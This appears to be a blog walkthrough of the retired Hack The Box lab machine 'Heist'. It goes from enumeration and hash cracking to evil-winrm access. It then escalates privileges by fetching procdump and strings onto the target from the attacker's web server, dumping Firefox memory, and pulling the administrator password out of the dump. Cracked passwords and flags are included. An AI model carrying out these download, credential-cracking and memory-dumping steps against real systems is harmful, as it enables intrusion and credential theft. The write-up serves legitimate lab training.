top of page

Heist


Enumeration


As usual, let's start with nmap:

nmap -sV -sC -p- 10.10.10.149

Open browser and go to 10.10.10.149


Click on Login as guest

Click on Attachment

Notice that the conversation was started by user Hazard


Looks like we may have found some credentials.

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

Let's do some password cracking. If we google password cracking type 7, we find a useful website called



$uperP@ssword

Q4)sJu\Y8qz*A3?d


Finally, we want to crack $1$pdQG$o8nrSzsGXeaduXrjlvKc91


To do that let's use hashcat


Go to Downloads folder for instance and create a new text file here called hashed.txt file and copy paste your hash in it using the nano command


Now run:

hashcat -m 500  hashed.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt

Wait until it finishes the initialization:


When the initialization is done you should get the following:

Type s to get the status

This might take a few minutes. It tells us below estimated time is 21 minutes. Just wait.


After a few minutes we get the password: stealth1agent


Note:

Hashcat assigns each algorithm a number or "hash mode". MD5 was assigned the hash mode 0 for instance.


-m 0 This advises hashcat that we are going to crack md5 passwords.

example:

8743b52063cd84097a65d1633f5c74f5


-m 500 is for 500md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)2

example:

$1$28772684$iEwNOgGugqO9.bIz5sk8k/


there are many different numbers, check out here full list:



Now let's turn to SMB. port 445 is open which is SMB.

smbclient -L 10.10.10.149
SMB authentication always require a username. If you don't specify one, it will use your VM username as default. When prompted to enter a password, just press enter.

Ok that didn't work, we were not able to get a list of the shares available.



Recap on credentials found so far:


passwords

Q4)sJu\Y8qz*A3?d

$uperP@ssword

stealth1agent


users

rout3r

admin

Hazard



smbclient -L 10.10.10.149 -U hazard

For the password, I tried all the password we found above and stealth1agent worked!

I checked all the shares available but access is denied

smbclient \\\\10.10.10.149\\ADMIN$ -U hazard
smbclient \\\\10.10.10.149\\C$ -U hazard
smbclient \\\\10.10.10.149\\IPC$ -U hazard
exit



Now we do have the credentials for one of the user

Hazard

stealth1agent


Let's use something called lookupsid.py from impacket. This might help us enumerate more users.

locate lookupsid

The one we need is:

/usr/share/doc/python3-impacket/examples/lookupsid.py


cd /usr/share/doc/python3-impacket/examples

python3 lookupsid.py

This tells us that we need to use the following format:

python3 lookupsid.py username:password@targetIP
python3 lookupsid.py Hazard:stealth1agent@10.10.10.149

There is another user called chase


Foothold


Let's use evil-winrm (winrm for windows remote management)

First we need to install it.


Open a brand new command prompt and type the following commands:


First we need to install the dependencies:

sudo gem install winrm winrm-fs stringio

Now we need to install git:

sudo apt install git

We need to clone this git

sudo git clone https://github.com/Hackplayers/evil-winrm.git

Now let's change directory

cd evil-winrm

Now we can connect to the target using:

./evil-winrm.rb -i 10.10.10.149 -u chase 

when prompted for the password enter:

Q4)sJu\Y8qz*A3?d


we are in!

cd C:\Users\Chase\Desktop
ls
cat user.txt

070b6281c238f9350ea8e09c75164cec


Congratulations! You got the flag!


Note that there is also a todo.txt on the desktop

cat todo.txt

Now let's look for the root flag

cd C:\Users\Administrator
ls

Access is denied. So we need to escalate our privileges.


Privilege Escalation


Let's see what processes are running:

ps

ps stand for Process Status


get-process firefox

Perhaps Chase is using Firefox to login to the Issues portal? We have control over the process so we could potentially do a process dump and perhaps find some passwords in it?


Let's use procdump. It can be used to dump process memory. From your VM, go to https://docs.microsoft.com/en-us/sysinternals/downloads/procdump and click on Download ProcDump


Once downloaded to your VM, open a new command prompt and type:

cd Downloads
ls

unzip Procdump.zip
ls

We now have procdump64.exe in our Downloads folder


From this Downloads folder, we are going to create a small webserver on our VM using:

sudo python3 -m http.server 8080
Make sure you stay in the Downloads folder

Now we have created a web service on our VM on port 8080

Do not close this window! Otherwise your webservice will be shutdown

Let's check that our web server is working by opening our web browser and type:

The IP of my VM is 10.10.14.3, yours will be different. If you don't know the IP of your VM, open a new command prompt and type ifconfig

OK now that our web service is working, we are going to get the target machine to go to http://10.10.14.3:8080 and retrieve procdump64.exe


To do that, go back to the target machine. Make sure you are C:\Users\Chase\Desktop using:

cd C:\Users\Chase\Desktop
ls

Now let's go get procdump64.exe from our web server

wget "http://10.10.14.3:8080/procdump64.exe" -outfile "procdump64.exe"

ls

We successfully downloaded procdump64.exe to the target machine!

get-process firefox

I am now going to pick one of the process ID, here I am picking the first one below, with process ID 380. Your process ID will be different.

I want to create a process dump of the process ID 380 (Firefox). To do that I am using the following command:

 .\procdump64.exe -ma 380 firefox.dmp

-ma flag is used to dump the entire memory of the Firefox process

firefox.dmp will be the name of my dump file




The first time you use this software you need to accept the eula by adding -accepteula

.\procdump64.exe -ma 380 firefox.dmp -accepteula

ls

Now that we have the dump, we need to download strings.exe


Click on Download Strings


cd Downloads
ls

Strings.zip has been downloaded to your VM


unzip Strings.zip

Type n and enter


ls

strings.exe is now in our Downloads folder, meaning that is is also still on our web server:

Now we need to get strings.exe downloaded onto the target machine. To do this, go back to the target machine and type:

wget "http://10.10.14.3:8080/strings.exe" -outfile "strings.exe"

ls

Great! srings.exe is now on the target machine.


We are going to use strings.exe to search in the dump file (firefox.dmp) for any strings that have the word "password" in it. The idea is to find the password for administrator in the Firefox dump.


To do that, type:

./strings.exe firefox.dmp | findstr /i password

This will take a while


We find the following credentials in the dump:

administrator

4dD!5}x/re8]FBuZ


Now that we have the credentials for the administrator account, we can use evil-winrm again, but this time login as administrator. From your VM, open a new command prompt window and type:

cd Downloads
ls
cd evil-winrm

./evil-winrm -i 10.10.10.149 -u administrator

Enter the password:

4dD!5}x/re8]FBuZ

We are in!


cd C:\Users\Administrator\Desktop

ls
cat root.txt

18bc5aa5da3882131238c4b019fde492


Congratulations! You got the root flag!





157 views0 comments

Recent Posts

See All

Previse

Backdoor

Lame

Comments

Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page